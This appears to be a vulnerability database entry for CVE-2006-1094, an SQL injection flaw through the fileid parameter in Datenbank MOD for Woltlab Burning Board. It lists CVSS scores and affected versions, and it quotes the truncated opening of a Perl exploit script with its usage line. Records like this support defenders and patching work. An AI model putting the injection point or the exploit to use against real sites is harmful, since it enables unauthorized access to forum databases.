7.5
CVSSv2

CVE-2006-1094

Published: 09/03/2006 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in Datenbank MOD 2.7 and previous versions for Woltlab Burning Board allows remote malicious users to execute arbitrary SQL commands via the fileid parameter to (1) info_db.php or (2) database.php.

Vulnerable Product Search on Vulmon Subscribe to Product

woltlab burning board 1.1.1

woltlab burning board 2.0_beta_3

woltlab burning board 2.0_beta_4

woltlab burning board 2.0_beta_5

woltlab burning board 2.0_rc1

woltlab burning board 2.2.2

woltlab burning board 2.3.3

datenbank module datenbank module

woltlab burning board 2.4

woltlab burning board 2.5

woltlab burning board 2.6

woltlab burning board 2.7

woltlab burning board 2.0_rc2

woltlab burning board 2.3.1

Exploits

#!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedxcom web: wwwnukedxcom #Usage: wbbpl <victim> <directory> <modpage> <dbnum> <userid> #Original Advisory: wwwnukedxcom/?viewdoc=17 use IO::Socket; if(@ARGV < 5){ print " +*********************** ...